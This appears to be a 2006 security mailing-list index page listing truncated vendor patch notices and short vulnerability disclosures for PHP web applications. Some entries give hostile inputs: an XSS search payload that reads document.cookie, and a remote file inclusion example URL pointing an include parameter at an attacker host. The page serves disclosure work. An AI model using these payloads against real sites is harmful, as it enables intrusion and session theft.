|
|
Colapse all |
Post message
[Updated] [FLSA-2006:186277] Updated sendmail packages fix security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:184098] Updated libc-client packages fixes security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:184074] Updated pine package fixes security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) Sire 2.0 Nws Remote File inclusion & Arbitary Files Upload 2006-04-07 simo64 gmail com by Moroccan Security Team Geetz To All Freind [+]File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "register_globals" is enabled. [lire.php code] <? 73 if(empty($_GET["rub [ more ] [ reply ] [FLSA-2006:180159] Updated unzip package fixes security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:183571-2] Updated tar package fixes security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [eVuln] Null news SQL Injection Vulnerability 2006-04-08 alex evuln com New eVuln Advisory: Null news SQL Injection Vulnerability http://evuln.com/vulns/109/summary.html --------------------Summary---------------- eVuln ID: EV0109 CVE: CVE-2006-1534 Software: Null news Sowtware's Web Site: http://nullbranded.tk/ Versions: 2005.07.27 Critical Level: Moderate Type: SQL I [ more ] [ reply ] [FLSA-2006:183571-1] Updated tar package fixes security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:170411] Updated imap packages fix security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:156290] Updated cyrus-imapd packages fix security issues 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) Xss In SaphpLesson3.0 2006-04-07 w3 _ hotmail com \ Software: SaphpLesson Web Site: http://www.arabless.com Versions:3.0 POWERED BY: SaphpLesson3.0 Type: Xss Enter http://www.xxx.com/xxx/search.php and search : <Script>alert(document.cookie)</Script> ||||||||||||||||||||||||||||||||||||||||||| |///////////////////////////////////// [ more ] [ reply ] [FLSA-2006:156139] Updated tcpdump packages fix security issues 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) [SECURITY] [DSA 946-2] New sudo packages fix privilege escalation 2006-04-08 joey infodrom org (Martin Schulze) [SECURITY] [DSA 1031-1] New cacti packages fix several vulnerabilities 2006-04-08 joey infodrom org (Martin Schulze) Autonomous LAN party File iNclusion 2006-04-08 codexploder linuxmail org Autonomous LAN party File iNclusion -------------------------------------------- Site:http://www.nerdclub.net/alp/ Demo:http://www.redfiles.net/cup/credits.php -------------------------------------------- Example: http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsi te ------ [ more ] [ reply ] [ MDKSA-2006:066 ] - Updated FreeRADIUS packages fix off-by-one overflow vulnerabilty 2006-04-05 security mandriva com Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer and server 2006-04-05 Luigi Auriemma (aluigi autistici org) jalvare7 (at) cajastur (dot) es [email concealed] wrote: > Could you confirm my impression that the server vulnerability can only > overflow the buffer in 3 bytes? Yes, the buffer is overflowed just by those 3 bytes plus the Windows error message created with FormatMessage(). > Is there a way to exploit this for code execut [ more ] [ reply ] [FLSA-2006:152896] Updated mod_python package fixes a security issue 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability 2006-04-05 Cisco Systems Product Security Incident Response Team (psirt cisco com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability Advisory ID: cisco-sa-20060405-css http://www.cisco.com/warp/public/707/cisco-sa-20060405-css.shtml Revision 1.0 For Public Release 2006 April 05 1500 GMT (UTC) [ more ] [ reply ] [SECURITY] [DSA 1024-1] New clamav packages fix several vulnerabilities 2006-04-05 Moritz Muehlenhoff (jmm debian org) [SECURITY] [DSA 1018-2] New Linux kernel 2.4.27 packages fix several vulnerabilities 2006-04-05 Moritz Muehlenhoff (jmm debian org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- Debian Security Advisory DSA 1018-2 security (at) debian (dot) org [email concealed] http://www.debian.org/security/ Dann Frazier, Simon Horman April 5th, 2006 [ more ] [ reply ] Re: recursive DNS servers DDoS as a growing DDoS problem 2006-04-05 Anton Ivanov (arivanov sigsegv cx) [FLSA-2006:152873] Updated xine package fixes security issues 2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca) Linux Kernel Local DoS vulnerability. 2006-04-04 fingerout (fingerout gmail com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello. I'd like to present one of Linux Kernel vulnerabilities. As far as I know, this one affects 2.6.x kernels. Problem - -- The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c. Each time user creates a posix timer, some kernel mem [ more ] [ reply ] |
|
Privacy Statement |
phpNewsManager Multiple SQL Injections
http://evuln.com/vulns/110/summary.html
--------------------Summary----------------
eVuln ID: EV0110
CVE: CVE-2006-1560
Vendor: SkinTech Group
Vendor's Web Site: http://www.skintech.org/
Software: phpNewsManager
Versions: 1.48
Critical Leve
[ more ] [ reply ]